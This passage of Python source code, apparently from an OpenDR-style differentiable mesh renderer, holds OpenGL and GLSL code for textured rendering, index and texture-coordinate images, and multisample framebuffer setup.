# return np.asarray((overdraw*boundarybool_image + no_overdraw*(1-boundarybool_image)), order='C')
@depends_on('f', 'frustum', 'camera', 'overdraw')
def barycentric_image(self):
self._call_on_changed()
# Overload method to call without overdraw.
return self.draw_barycentric_image(self.boundarybool_image if self.overdraw else None)
@depends_on('f', 'frustum', 'camera', 'overdraw')
def visibility_image(self):
self._call_on_changed()
# Overload method to call without overdraw.
return self.draw_visibility_image(self.v.r, self.f, self.boundarybool_image if self.overdraw else None)
def image_mesh_bool(self, meshes):
self.makeCurrentContext()
self._call_on_changed()
GL.glPolygonMode(GL.GL_FRONT_AND_BACK, GL.GL_FILL)
self._call_on_changed()
GL.glClearColor(0., 0., 0., 1.)
# use face colors if given
# FIXME: this won't work for 2 channels
GL.glBindFramebuffer(GL.GL_DRAW_FRAMEBUFFER, self.fbo)
GL.glClear(GL.GL_COLOR_BUFFER_BIT | GL.GL_DEPTH_BUFFER_BIT)
GL.glUseProgram(self.colorProgram)
for mesh in meshes:
self.draw_index(mesh)
GL.glBindFramebuffer(GL.GL_FRAMEBUFFER, self.fbo)
GL.glReadBuffer(GL.GL_COLOR_ATTACHMENT0)
result = np.flipud(
np.frombuffer(GL.glReadPixels(0, 0, self.frustum['width'], self.frustum['height'], GL.GL_RGB, GL.GL_UNSIGNED_BYTE), np.uint8).reshape(
self.frustum['height'], self.frustum['width'], 3).astype(np.uint32))[:, :, 0]
GL.glBindFramebuffer(GL.GL_DRAW_FRAMEBUFFER, self.fbo)
return result != 0
@depends_on(dterms + terms)
def indices_image(self):
self._call_on_changed()
self.makeCurrentContext()
GL.glPolygonMode(GL.GL_FRONT_AND_BACK, GL.GL_FILL)
self._call_on_changed()
GL.glClearColor(0., 0., 0., 1.)
# use face colors if given
# FIXME: this won't work for 2 channels
GL.glBindFramebuffer(GL.GL_DRAW_FRAMEBUFFER, self.fbo)
GL.glClear(GL.GL_COLOR_BUFFER_BIT | GL.GL_DEPTH_BUFFER_BIT)
GL.glUseProgram(self.colorProgram)
for index in range(len(self.f_list)):
self.draw_index(index)
GL.glBindFramebuffer(GL.GL_FRAMEBUFFER, self.fbo)
GL.glReadBuffer(GL.GL_COLOR_ATTACHMENT0)
result = np.flipud(
np.frombuffer(GL.glReadPixels(0, 0, self.frustum['width'], self.frustum['height'], GL.GL_RGB, GL.GL_UNSIGNED_BYTE), np.uint8).reshape(
self.frustum['height'], self.frustum['width'], 3).astype(np.uint32))[:, :, 0]
GL.glBindFramebuffer(GL.GL_DRAW_FRAMEBUFFER, self.fbo)
return result
def draw_index(self, index):
mesh = index
view_mtx = self.camera.openglMat.dot(np.asarray(np.vstack((self.camera.view_matrix, np.array([0, 0, 0, 1]))), np.float32))
MVP = np.dot(self.projectionMatrix, view_mtx)
vc = self.vc_list[mesh]
for polygons in np.arange(len(self.f_list[mesh])):
vao_mesh = self.vao_tex_mesh_list[mesh][polygons]
GL.glBindVertexArray(vao_mesh)
f = self.f_list[mesh][polygons]
vbo_color = self.vbo_colors_mesh[mesh][polygons]
colors_by_face = np.asarray(vc.reshape((-1, 3))[f.ravel()], dtype=np.float32, order='C')
colors = np.array(np.ones_like(colors_by_face) * (index) / 255.0, dtype=np.float32)
# Pol: Make a static zero vbo_color to make it more efficient?
vbo_color.set_array(colors)
vbo_f = self.vbo_indices_mesh_list[mesh][polygons]
vbo_color.bind()
if self.f.shape[1] == 2:
primtype = GL.GL_LINES
else:
primtype = GL.GL_TRIANGLES
GL.glUniformMatrix4fv(self.MVP_location, 1, GL.GL_TRUE, MVP)
GL.glDrawArrays(primtype, 0, len(vbo_f) * vbo_f.data.shape[1])
def draw_texcoord_image(self, v, f, ft, boundarybool_image=None):
# gl = glf
# gl.Disable(GL_TEXTURE_2D)
# gl.DisableClientState(GL_TEXTURE_COORD_ARR
self.makeCurrentContext()
shaders.glUseProgram(self.colorProgram)
GL.glBindFramebuffer(GL.GL_DRAW_FRAMEBUFFER, self.fbo)
GL.glClear(GL.GL_COLOR_BUFFER_BIT | GL.GL_DEPTH_BUFFER_BIT)
# want vtc: texture-coordinates per vertex (not per element in vc)
colors = ft
# use the third channel to identify the corresponding textures.
color3 = np.vstack([np.ones([self.ft_list[mesh].shape[0], 1]) * mesh for mesh in range(len(self.ft_list))]).astype(np.float32) / len(
self.ft_list)
colors = np.asarray(np.hstack((colors, color3)), np.float64, order='C')
self.draw_colored_primitives(self.vao_dyn, v, f, colors)
# Why do we need this?
if boundarybool_image is not None:
GL.glPolygonMode(GL.GL_FRONT_AND_BACK, GL.GL_LINE)
self.draw_colored_primitives(self.vao_dyn, v, f, colors)
GL.glPolygonMode(GL.GL_FRONT_AND_BACK, GL.GL_FILL)
GL.glBindFramebuffer(GL.GL_FRAMEBUFFER, self.fbo)
GL.glReadBuffer(GL.GL_COLOR_ATTACHMENT0)
result = np.flipud(
np.frombuffer(GL.glReadPixels(0, 0, self.frustum['width'], self.frustum['height'], GL.GL_RGB, GL.GL_UNSIGNED_BYTE), np.uint8).reshape(
self.frustum['height'], self.frustum['width'], 3).astype(np.float64)) / 255.0
result[:, :, 1] = 1. - result[:, :, 1]
return result
@depends_on('ft', 'textures')
def mesh_tex_coords(self):
ftidxs = self.ft.ravel()
data = self.ft
# Pol: careful with this:
data[:, 1] = 1.0 - 1.0 * data[:, 1]
return data
# Depends on 'f' because vpe/fpe depend on f
# Pol: Check that depends on works on other attributes that depend_on x, if x changes.
@depends_on('ft', 'f')
def wireframe_tex_coords(self):
print("wireframe_tex_coords is being computed!")
vvt = np.zeros((self.v.r.size // 3, 2), dtype=np.float64, order='C')
vvt[self.f.flatten()] = self.mesh_tex_coords
edata = vvt[self.ma.ravel()]
return edata
# TODO: can this not be inherited from base? turning off texture mapping in that instead?
@depends_on(dterms + terms)
def boundaryid_image(self):
self._call_on_changed()
# self.texture_mapping_of
self.makeCurrentContext()
GL.glUseProgram(self.colorProgram)
result = self.draw_boundaryid_image(self.v.r, self.f, self.vpe, self.fpe, self.camera)
GL.glUseProgram(self.colorTextureProgram)
# self.texture_mapping_on(with_vertex_colors=True)
return result
def draw_color_image(self, with_vertex_colors=True, with_texture_on=True):
self.makeCurrentContext()
self._call_on_changed()
GL.glEnable(GL.GL_MULTISAMPLE)
if hasattr(self, 'bgcolor'):
GL.glClearColor(self.bgcolor.r[0], self.bgcolor.r[1 % self.num_channels], self.bgcolor.r[2 % self.num_channels], 1.)
# use face colors if given
# FIXME: this won't work for 2 channels
GL.glBindFramebuffer(GL.GL_DRAW_FRAMEBUFFER, self.fbo)
GL.glClear(GL.GL_COLOR_BUFFER_BIT | GL.GL_DEPTH_BUFFER_BIT)
if self.msaa:
GL.glBindFramebuffer(GL.GL_DRAW_FRAMEBUFFER, self.fbo_ms)
else:
GL.glBindFramebuffer(GL.GL_DRAW_FRAMEBUFFER, self.fbo_noms)
GL.glClear(GL.GL_COLOR_BUFFER_BIT | GL.GL_DEPTH_BUFFER_BIT)
view_mtx = self.camera.openglMat.dot(np.asarray(np.vstack((self.camera.view_matrix, np.array([0, 0, 0, 1]))), np.float32))
MVP = np.dot(self.projectionMatrix, view_mtx)
for mesh in range(len(self.f_list)):
for polygons in np.arange(len(self.f_list[mesh])):
vao_mesh = self.vao_tex_mesh_list[mesh][polygons]
vbo_f = self.vbo_indices_mesh_list[mesh][polygons]
GL.glBindVertexArray(vao_mesh)
f = self.f_list[mesh][polygons]
verts_by_face = np.asarray(self.v_list[mesh].reshape((-1, 3))[f.ravel()], dtype=np.float32, order='C')
vbo_color = self.vbo_colors_mesh[mesh][polygons]
colors_by_face = np.asarray(self.vc_list[mesh].reshape((-1, 3))[f.ravel()], dtype=np.float32, order='C')
vc = colors_by_face
if with_vertex_colors:
colors = vc.astype(np.float32)
else:
# Only texture.
colors = np.ones_like(vc).astype(np.float32)
# Pol: Make a static zero vbo_color to make it more efficient?
vbo_color.set_array(colors)
vbo_color.bind()
if self.f.shape[1] == 2:
primtype = GL.GL_LINES
else:
primtype = GL.GL_TRIANGLES
if with_texture_on and self.haveUVs_list[mesh][polygons]:
GL.glUseProgram(self.colorTextureProgram)
texture = self.textureID_mesh_list[mesh][polygons]
GL.glActiveTexture(GL.GL_TEXTURE0)
GL.glBindTexture(GL.GL_TEXTURE_2D, texture)
GL.glUniform1i(self.textureID, 0)
else:
GL.glUseProgram(self.colorProgram)
GL.glUniformMatrix4fv(self.MVP_texture_location, 1, GL.GL_TRUE, MVP)
GL.glDrawArrays(primtype, 0, len(vbo_f) * vbo_f.data.shape[1])
# GL.glDrawElements(primtype, len(vbo_f)*vbo_f.data.shape[1], GL.GL_UNSIGNED_INT, None)
if self.msaa:
GL.glBindFramebuffer(GL.GL_READ_FRAMEBUFFER, self.fbo_ms)
else:
GL.glBindFramebuffer(GL.GL_READ_FRAMEBUFFER, self.fbo_noms)
GL.glBindFramebuffer(GL.GL_DRAW_FRAMEBUFFER, self.fbo)
GL.glBlitFramebuffer(0, 0, self.frustum['width'], self.frustum['height'], 0, 0, self.frustum['width'], self.frustum['height'],
GL.GL_COLOR_BUFFER_BIT, GL.GL_LINEAR)
GL.glBindFramebuffer(GL.GL_FRAMEBUFFER, self.fbo)
GL.glReadBuffer(GL.GL_COLOR_ATTACHMENT0)
result = np.flipud(
np.frombuffer(GL.glReadPixels(0, 0, self.frustum['width'], self.frustum['height'], GL.GL_RGB, GL.GL_UNSIGNED_BYTE), np.uint8).reshape(
self.frustum['height'], self.frustum['width'], 3).astype(np.float64)) / 255.0
GL.glBindFramebuffer(GL.GL_DRAW_FRAMEBUFFER, self.fbo)
GL.glDisable(GL.GL_MULTISAMPLE)
GL.glClearColor(0., 0., 0., 1.)
if hasattr(self, 'background_image'):
bg_px = np.tile(np.atleast_3d(self.visibility_image) == 4294967295, (1, 1, 3))
fg_px = 1 - bg_px
result = bg_px * self.background_image + fg_px * result
return result
@depends_on('ft', 'f', 'frustum', 'camera')
def texcoord_image_quantized(self):
texcoord_image = self.texcoord_image[:, :, :2].copy()
# Temporary:
self.texture_image = self.textures_list[0][0].r.copy()
texcoord_image[:, :, 0] *= self.texture_image.shape[1] - 1
texcoord_image[:, :, 1] *= self.texture_image.shape[0] - 1
texture_idx = (self.texcoord_image[:, :, 2] * len(self.ft_list)).astype(np.uint32)
texcoord_image = np.round(texcoord_image)
texcoord_image = texcoord_image[:, :, 0] + texcoord_image[:, :, 1] * self.texture_image.shape[1]
return texcoord_image, texture_idx
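# texcoord_image_quantized maps normalized UVs in [0, 1] to rounded texel
# coordinates and then to a flat index x + y * W. A standalone sketch with a
# hypothetical 3x4 (H x W) texture (illustrative only):

```python
import numpy as np

# normalized uv coordinates and a hypothetical texture of height 3, width 4
uv = np.array([[0.0, 0.0], [1.0, 1.0], [0.5, 0.5]])
tex_h, tex_w = 3, 4

x = np.round(uv[:, 0] * (tex_w - 1))
y = np.round(uv[:, 1] * (tex_h - 1))
flat = x + y * tex_w  # same flattening as texcoord_image_quantized

assert flat.tolist() == [0.0, 11.0, 6.0]
```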
def checkBufferNum(self):
GL.glGenBuffers(1)
@depends_on('ft', 'f', 'frustum', 'camera')
def texcoord_image(self):
return self.draw_texcoord_image(self.v.r, self.f, self.ft, self.boundarybool_image if self.overdraw else None)
class ResidualRendererOpenDR(ColoredRenderer):
terms = 'f', 'frustum', 'vt', 'ft', 'background_image', 'overdraw', 'ft_list', 'haveUVs_list', 'textures_list', 'vc_list', 'imageGT'
dterms = 'vc', 'camera', 'bgcolor', 'texture_stack', 'v'
def __init__(self):
super().__init__()
def clear(self):
try:
GL.glFlush()
GL.glFinish()
# Clearing textured renderer: empty, bind/unbind and delete every VBO.
all_vbo_lists = self.vbo_indices_mesh_list + self.vbo_colors_mesh + self.vbo_verts_mesh + self.vbo_uvs_mesh + self.vbo_face_ids_list
[vbo.set_array(np.array([])) for sublist in all_vbo_lists for vbo in sublist]
[vbo.bind() for sublist in all_vbo_lists for vbo in sublist]
[vbo.unbind() for sublist in all_vbo_lists for vbo in sublist]
[vbo.delete() for sublist in all_vbo_lists for vbo in sublist]
[GL.glDeleteVertexArrays(1, [vao.value]) for sublist in self.vao_tex_mesh_list for vao in sublist]
self.release_textures()
if self.glMode == 'glfw':
import glfw
glfw.make_context_current(self.win)
GL.glDeleteProgram(self.colorTextureProgram)
super().clear()
except Exception:
print("Program has not been initialized.")
import pdb
pdb.set_trace()
def initGLTexture(self):
print("Initializing Texture OpenGL.")
FRAGMENT_SHADER = shaders.compileShader("""#version 330 core
// Interpolated values from the vertex shaders
in vec3 theColor;
in vec2 UV;
uniform sampler2D myTextureSampler;
// Output data
out vec3 color;
void main(){
color = theColor * texture(myTextureSampler, UV).rgb;
}""", GL.GL_FRAGMENT_SHADER)
VERTEX_SHADER = shaders.compileShader("""#version 330 core
// Input vertex data, different for all executions of this shader.
layout (location = 0) in vec3 position;
layout (location = 1) in vec3 color;
layout(location = 2) in vec2 vertexUV;
uniform mat4 MVP;
out vec3 theColor;
out vec2 UV;
// Values that stay constant for the whole mesh.
void main(){
// Output position of the vertex, in clip space : MVP * position
gl_Position = MVP* vec4(position,1);
theColor = color;
UV = vertexUV;
}""", GL.GL_VERTEX_SHADER)
self.colorTextureProgram = shaders.compileProgram(VERTEX_SHADER, FRAGMENT_SHADER)
# Define the other VAO/VBOs and shaders.
# Text VAO and bind color, vertex indices AND uvbuffer:
position_location = GL.glGetAttribLocation(self.colorTextureProgram, 'position')
color_location = GL.glGetAttribLocation(self.colorTextureProgram, 'color')
uvs_location = GL.glGetAttribLocation(self.colorTextureProgram, 'vertexUV')
# color_location_ub = GL.glGetAttribLocation(self.colorProgram, 'color')
self.MVP_texture_location = GL.glGetUniformLocation(self.colorTextureProgram, 'MVP')
self.vbo_indices_mesh_list = []
self.vbo_colors_mesh = []
self.vbo_verts_mesh = []
self.vao_tex_mesh_list = []
self.vbo_uvs_mesh = []
self.textureID_mesh_list = []
# GL.glEnable(GL.GL_LINE_SMOOTH)
# GL.glHint(GL.GL_LINE_SMOOTH_HINT, GL.GL_NICEST)
GL.glLineWidth(2.)
self.line_width = 2.
for mesh in range(len(self.f_list)):
vaos_mesh = []
vbo_indices_mesh = []
vbo_face_ids_mesh = []
vbo_colors_mesh = []
vbo_vertices_mesh = []
vbo_uvs_mesh = []
textureIDs_mesh = []
for polygons in range(len(self.f_list[mesh])):
vao = GL.GLuint(0)
GL.glGenVertexArrays(1, vao)
GL.glBindVertexArray(vao)
f = self.f_list[mesh][polygons]
verts_by_face = np.asarray(self.v_list[mesh].reshape((-1, 3))[f.ravel()], dtype=np.float32, order='C')
vbo_verts = vbo.VBO(np.array(verts_by_face).astype(np.float32))
colors_by_face = np.asarray(self.vc_list[mesh].reshape((-1, 3))[f.ravel()], dtype=np.float32, order='C')
vbo_colors = vbo.VBO(np.array(colors_by_face).astype(np.float32))
uvs_by_face = np.asarray(self.ft_list[mesh].reshape((-1, 2))[f.ravel()], dtype=np.float32, order='C')
vbo_uvs = vbo.VBO(np.array(uvs_by_face).astype(np.float32))
vbo_indices = vbo.VBO(np.array(self.f_list[mesh][polygons]).astype(np.uint32), target=GL.GL_ELEMENT_ARRAY_BUFFER)
vbo_indices.bind()
vbo_verts.bind()
GL.glEnableVertexAttribArray(position_location) # from 'location = 0' in shader
GL.glVertexAttribPointer(position_location, 3, GL.GL_FLOAT, GL.GL_FALSE, 0, None)
vbo_colors.bind()
GL.glEnableVertexAttribArray(color_location)  # from 'location = 1' in shader
GL.glVertexAttribPointer(color_location, 3, GL.GL_FLOAT, GL.GL_FALSE, 0, None)
if self.haveUVs_list[mesh][polygons]:
vbo_uvs.bind()
GL.glEnableVertexAttribArray(uvs_location)  # from 'location = 2' in shader
GL.glVertexAttribPointer(uvs_location, 2, GL.GL_FLOAT, GL.GL_FALSE, 0, None)
# Textures:
texture = None
if self.haveUVs_list[mesh][polygons]:
texture = GL.GLuint(0)
GL.glGenTextures(1, texture)
GL.glBindTexture(GL.GL_TEXTURE_2D, texture)  # bind before setting sampler parameters
GL.glPixelStorei(GL.GL_UNPACK_ALIGNMENT, 1)
GL.glTexParameterf(GL.GL_TEXTURE_2D, GL.GL_TEXTURE_MAG_FILTER, GL.GL_LINEAR)
GL.glTexParameterf(GL.GL_TEXTURE_2D, GL.GL_TEXTURE_MIN_FILTER, GL.GL_LINEAR_MIPMAP_LINEAR)
GL.glTexParameteri(GL.GL_TEXTURE_2D, GL.GL_TEXTURE_BASE_LEVEL, 0)
GL.glTexParameteri(GL.GL_TEXTURE_2D, GL.GL_TEXTURE_MAX_LEVEL, 0)
image = np.array(np.flipud(self.textures_list[mesh][polygons]), order='C', dtype=np.float32)
GL.glTexStorage2D(GL.GL_TEXTURE_2D, 1, GL.GL_RGB32F, image.shape[1], image.shape[0])
GL.glTexSubImage2D(GL.GL_TEXTURE_2D, 0, 0, 0, image.shape[1], image.shape[0], GL.GL_RGB, GL.GL_FLOAT, image)
textureIDs_mesh.append(texture)
vbo_indices_mesh.append(vbo_indices)
vbo_colors_mesh.append(vbo_colors)
vbo_vertices_mesh.append(vbo_verts)
vbo_uvs_mesh.append(vbo_uvs)
vaos_mesh.append(vao)
self.textureID_mesh_list.append(textureIDs_mesh)
self.vao_tex_mesh_list.append(vaos_mesh)
self.vbo_indices_mesh_list.append(vbo_indices_mesh)
self.vbo_colors_mesh.append(vbo_colors_mesh)
self.vbo_verts_mesh.append(vbo_vertices_mesh)
self.vbo_uvs_mesh.append(vbo_uvs_mesh)
GL.glBindTexture(GL.GL_TEXTURE_2D, 0)
GL.glBindVertexArray(0)
self.textureID = GL.glGetUniformLocation(self.colorTextureProgram, "myTextureSampler")
def initGL_AnalyticRenderer(self):
self.updateRender = True
self.updateDerivatives = True
GL.glEnable(GL.GL_MULTISAMPLE)
# GL.glHint(GL.GL_MULTISAMPLE_FILTER_HINT_NV, GL.GL_NICEST);
GL.glEnable(GL.GL_SAMPLE_SHADING)
GL.glMinSampleShading(1.0)
VERTEX_SHADER = shaders.compileShader("""#version 330 core
// Input vertex data, different for all executions of this shader.
layout (location = 0) in vec3 position;
layout (location = 1) in vec3 colorIn;
layout(location = 2) in vec2 vertexUV;
layout(location = 3) in uint face_id;
layout(location = 4) in vec3 barycentric;
uniform mat4 MVP;
out vec3 theColor;
out vec4 pos;
flat out uint face_out;
out vec3 barycentric_vert_out;
out vec2 UV;
// Values that stay constant for the whole mesh.
void main(){
// Output position of the vertex, in clip space : MVP * position
gl_Position = MVP* vec4(position,1);
pos = MVP * vec4(position,1);
//pos = pos4.xyz;
theColor = colorIn;
UV = vertexUV;
face_out = face_id;
barycentric_vert_out = barycentric;
}""", GL.GL_VERTEX_SHADER)
ERRORS_FRAGMENT_SHADER = shaders.compileShader("""#version 330 core
#extension GL_ARB_explicit_uniform_location : enable
#extension GL_ARB_explicit_attrib_location : enable
//layout(early_fragment_tests) in;
// Interpolated values from the vertex shaders
in vec3 theColor;
in vec2 UV;
flat in uint face_out;
in vec4 pos;
in vec3 barycentric_vert_out;
layout(location = 3) uniform sampler2D myTextureSampler;
uniform float ww;
uniform float wh;
// Output data
layout(location = 0) out vec3 color;
layout(location = 1) out vec2 sample_pos;
layout(location = 2) out uint sample_face;
layout(location = 3) out vec2 barycentric1;
layout(location = 4) out vec2 barycentric2;
void main(){
vec3 finalColor = theColor * texture(myTextureSampler, UV).rgb;
color = finalColor.rgb;
sample_pos = ((0.5*pos.xy/pos.w) + 0.5)*vec2(ww,wh);
sample_face = face_out;
barycentric1 = barycentric_vert_out.xy;
barycentric2 = vec2(barycentric_vert_out.z, 0.);
}""", GL.GL_FRAGMENT_SHADER)
self.errorTextureProgram = shaders.compileProgram(VERTEX_SHADER, ERRORS_FRAGMENT_SHADER)
FETCH_VERTEX_SHADER = shaders.compileShader("""#version 330 core
// Input vertex data, different for all executions of this shader.
void main() {}
""", GL.GL_VERTEX_SHADER)
FETCH_GEOMETRY_SHADER = shaders.compileShader("""#version 330 core
layout(points) in;
layout(triangle_strip, max_vertices = 4) out;
const vec2 data[4] = vec2[]
(
vec2(-1.0, 1.0),
vec2(-1.0, -1.0),
vec2( 1.0, 1.0),
vec2( 1.0, -1.0)
);
void main() {
for (int i = 0; i < 4; ++i) {
gl_Position = vec4( data[i], 0.0, 1.0 );
EmitVertex();
}
EndPrimitive();
}""", GL.GL_GEOMETRY_SHADER)
FETCH_FRAGMENT_SHADER = shaders.compileShader("""#version 330 core
#extension GL_ARB_explicit_uniform_location : enable
#extension GL_ARB_explicit_attrib_location : enable
layout(location = 2) uniform sampler2DMS colors;
layout(location = 3) uniform sampler2DMS sample_positions;
layout(location = 4) uniform usampler2DMS sample_faces;
layout(location = 5) uniform sampler2DMS sample_barycentric_coords1;
layout(location = 6) uniform sampler2DMS sample_barycentric_coords2;
//layout(location = 7) uniform sampler2D imageGT;
uniform float ww;
uniform float wh;
uniform int sample;
// Output data
layout(location = 0) out vec3 colorFetchOut;
layout(location = 1) out vec2 sample_pos;
layout(location = 2) out uint sample_face;
layout(location = 3) out vec2 sample_barycentric1;
layout(location = 4) out vec2 sample_barycentric2;
//layout(location = 5) out vec3 res;
//out int gl_SampleMask[];
const int all_sample_mask = 0xffff;
void main(){
ivec2 texcoord = ivec2(gl_FragCoord.xy);
colorFetchOut = texelFetch(colors, texcoord, sample).xyz;
sample_pos = texelFetch(sample_positions, texcoord, sample).xy;
sample_face = texelFetch(sample_faces, texcoord, sample).r;
sample_barycentric1 = texelFetch(sample_barycentric_coords1, texcoord, sample).xy;
sample_barycentric2 = texelFetch(sample_barycentric_coords2, texcoord, sample).xy;
//vec3 imgColor = texture2D(imageGT, gl_FragCoord.xy/vec2(ww,wh)).rgb;
//res = imgColor - colorFetchOut;
}""", GL.GL_FRAGMENT_SHADER)
GL.glClampColor(GL.GL_CLAMP_READ_COLOR, False)
# GL.glClampColor(GL.GL_CLAMP_VERTEX_COLOR, False)
# GL.glClampColor(GL.GL_CLAMP_FRAGMENT_COLOR, False)
self.fetchSamplesProgram = shaders.compileProgram(FETCH_VERTEX_SHADER, FETCH_GEOMETRY_SHADER, FETCH_FRAGMENT_SHADER)
self.textureGT = GL.GLuint(0)
# GL.glActiveTexture(GL.GL_TEXTURE1)
# GL.glGenTextures(1, self.textureGT)
# GL.glBindTexture(GL.GL_TEXTURE_2D, self.textureGT)
# self.textureGTLoc = GL.glGetUniformLocation(self.errorTextureProgram, "imageGT")
# GL.glPixelStorei(GL.GL_UNPACK_ALIGNMENT,1)
# GL.glTexParameterf(GL.GL_TEXTURE_2D, GL.GL_TEXTURE_MAG_FILTER, GL.GL_LINEAR)
# GL.glTexParameterf(GL.GL_TEXTURE_2D, GL.GL_TEXTURE_MIN_FILTER, GL.GL_LINEAR_MIPMAP_LINEAR)
# GL.glTexParameteri(GL.GL_TEXTURE_2D, GL.GL_TEXTURE_BASE_LEVEL, 0)
# GL.glTexParameteri(GL.GL_TEXTURE_2D, GL.GL_TEXTURE_MAX_LEVEL, 0)
# #
# try:
# if self.imageGT.r is not None and self.imageGT.r.size != 0: #if GT image is defined.
# image = np.array(np.flipud((self.imageGT.r)), order='C', dtype=np.float32)
# GL.glTexStorage2D(GL.GL_TEXTURE_2D, 1, GL.GL_RGB32F, image.shape[1], image.shape[0])
# GL.glTexSubImage2D(GL.GL_TEXTURE_2D, 0, 0, 0, image.shape[1], image.shape[0], GL.GL_RGB, GL.GL_FLOAT, image)
# except:
# pass
# GL.glGenTextures(1, self.textureEdges)
# GL.glBindTexture(GL.GL_TEXTURE_2D, self.textureEdges)
# GL.glPixelStorei(GL.GL_UNPACK_ALIGNMENT,1)
# GL.glTexParameterf(GL.GL_TEXTURE_2D, GL.GL_TEXTURE_MAG_FILTER, GL.GL_NEAREST)
# GL.glTexParameterf(GL.GL_TEXTURE_2D, GL.GL_TEXTURE_MIN_FILTER, GL.GL_NEAREST)
# GL.glTexParameteri(GL.GL_TEXTURE_2D, GL.GL_TEXTURE_BASE_LEVEL, 0)
# GL.glTexParameteri(GL.GL_TEXTURE_2D, GL.GL_TEXTURE_MAX_LEVEL, 0)
# texture = GL.GLuint(0)
# GL.glGenTextures(1, texture)
# GL.glBindTexture(GL.GL_TEXTURE_2D, texture)
# image = np.array(np.flipud((self.textures_list[mesh][polygons])), order='C', dtype=np.float32)
# GL.glTexStorage2D(GL.GL_TEXTURE_2D, 1, GL.GL_RGB32F, image.shape[1], image.shape[0])
# GL.glTexSubImage2D(GL.GL_TEXTURE_2D, 0, 0, 0, image.shape[1], image.shape[0], GL.GL_RGB, GL.GL_FLOAT, image)
GL.glBindTexture(GL.GL_TEXTURE_2D, 0)
GL.glActiveTexture(GL.GL_TEXTURE0)
whitePixel = np.ones([4, 4, 3])
self.whitePixelTextureID = GL.GLuint(0)
GL.glGenTextures(1, self.whitePixelTextureID)
GL.glBindTexture(GL.GL_TEXTURE_2D, self.whitePixelTextureID)
GL.glPixelStorei(GL.GL_UNPACK_ALIGNMENT, 1)
GL.glTexParameterf(GL.GL_TEXTURE_2D, GL.GL_TEXTURE_MAG_FILTER, GL.GL_LINEAR)
GL.glTexParameterf(GL.GL_TEXTURE_2D, GL.GL_TEXTURE_MIN_FILTER, GL.GL_LINEAR_MIPMAP_LINEAR)
GL.glTexParameteri(GL.GL_TEXTURE_2D, GL.GL_TEXTURE_BASE_LEVEL, 0)
GL.glTexParameteri(GL.GL_TEXTURE_2D, GL.GL_TEXTURE_MAX_LEVEL, 0)
GL.glTexParameteri(GL.GL_TEXTURE_2D, GL.GL_TEXTURE_WRAP_S, GL.GL_CLAMP_TO_EDGE)
GL.glTexParameteri(GL.GL_TEXTURE_2D, GL.GL_TEXTURE_WRAP_T, GL.GL_CLAMP_TO_EDGE)
image = np.array(np.flipud(whitePixel), order='C', dtype=np.float32)
GL.glTexImage2D(GL.GL_TEXTURE_2D, 0, GL.GL_RGB32F, image.shape[1], image.shape[0], 0, GL.GL_RGB, GL.GL_FLOAT, image)
# GL.glTexStorage2D(GL.GL_TEXTURE_2D, 1, GL.GL_RGBA8, image.shape[1], image.shape[0])
# GL.glTexSubImage2D(GL.GL_TEXTURE_2D, 0, 0, 0, image.shape[1], image.shape[0], GL.GL_RGB, GL.GL_FLOAT, image)
self.fbo_ms_errors = GL.glGenFramebuffers(1)
GL.glDepthMask(GL.GL_TRUE)
GL.glEnable(GL.GL_MULTISAMPLE)
# GL.glHint(GL.GL_MULTISAMPLE_FILTER_HINT_NV, GL.GL_NICEST);
GL.glEnable(GL.GL_SAMPLE_SHADING)
GL.glMinSampleShading(1.0)
GL.glBindFramebuffer(GL.GL_FRAMEBUFFER, self.fbo_ms_errors)
self.texture_errors_render = GL.glGenTextures(1)
GL.glBindTexture(GL.GL_TEXTURE_2D_MULTISAMPLE, self.texture_errors_render)
GL.glTexImage2DMultisample(GL.GL_TEXTURE_2D_MULTISAMPLE, self.nsamples, GL.GL_RGB8, self.frustum['width'], self.frustum['height'], False)
# GL.glTexParameteri(GL.GL_TEXTURE_2D_MULTISAMPLE, GL.GL_TEXTURE_MIN_FILTER, GL.GL_NEAREST)
# GL.glTexParameteri(GL.GL_TEXTURE_2D_MULTISAMPLE, GL.GL_TEXTURE_MAG_FILTER, GL.GL_NEAREST)
# GL.glTexParameteri(GL.GL_TEXTURE_2D, GL.GL_TEXTURE_MIN_FILTER, GL.GL_LINEAR)
GL.glFramebufferTexture2D(GL.GL_FRAMEBUFFER, GL.GL_COLOR_ATTACHMENT0, GL.GL_TEXTURE_2D_MULTISAMPLE, self.texture_errors_render, 0)
self.texture_errors_sample_position = GL.glGenTextures(1)
GL.glBindTexture(GL.GL_TEXTURE_2D_MULTISAMPLE, self.texture_errors_sample_position)
GL.glTexImage2DMultisample(GL.GL_TEXTURE_2D_MULTISAMPLE, self.nsamples, GL.GL_RG32F, self.frustum['width'], self.frustum['height'], False)
# GL.glTexParameteri(GL.GL_TEXTURE_2D_MULTISAMPLE, GL.GL_TEXTURE_MIN_FILTER, GL.GL_NEAREST)
# GL.glTexParameteri(GL.GL_TEXTURE_2D_MULTISAMPLE, GL.GL_TEXTURE_MAG_FILTER, GL.GL_NEAREST)
# GL.glTexParameteri(GL.GL_TEXTURE_2D, GL.GL_TEXTURE_MIN_FILTER, GL.GL_LINEAR)
GL.glFramebufferTexture2D(GL.GL_FRAMEBUFFER, GL.GL_COLOR_ATTACHMENT1, GL.GL_TEXTURE_2D_MULTISAMPLE, self.texture_errors_sample_position, 0)
self.texture_errors_sample_faces = GL.glGenTextures(1)
GL.glBindTexture(GL.GL_TEXTURE_2D_MULTISAMPLE, self.texture_errors_sample_faces)
GL.glTexImage2DMultisample(GL.GL_TEXTURE_2D_MULTISAMPLE, self.nsamples, GL.GL_R32UI, self.frustum['width'], self.frustum['height'], False)
# GL.glTexParameteri(GL.GL_TEXTURE_2D, GL.GL_TEXTURE_MIN_FILTER, GL.GL_LINEAR)
GL.glFramebufferTexture2D(GL.GL_FRAMEBUFFER, GL.GL_COLOR_ATTACHMENT2, GL.GL_TEXTURE_2D_MULTISAMPLE, self.texture_errors_sample_faces, 0)
#
self.texture_errors_sample_barycentric1 = GL.glGenTextures(1)
GL.glBindTexture(GL.GL_TEXTURE_2D_MULTISAMPLE, self.texture_errors_sample_barycentric1)
GL.glTexImage2DMultisample(GL.GL_TEXTURE_2D_MULTISAMPLE, self.nsamples, GL.GL_RG32F, self.frustum['width'], self.frustum['height'], False)
# GL.glTexParameteri(GL.GL_TEXTURE_2D_MULTISAMPLE, GL.GL_TEXTURE_MIN_FILTER, GL.GL_NEAREST)
# GL.glTexParameteri(GL.GL_TEXTURE_2D_MULTISAMPLE, GL.GL_TEXTURE_MAG_FILTER, GL.GL_NEAREST)
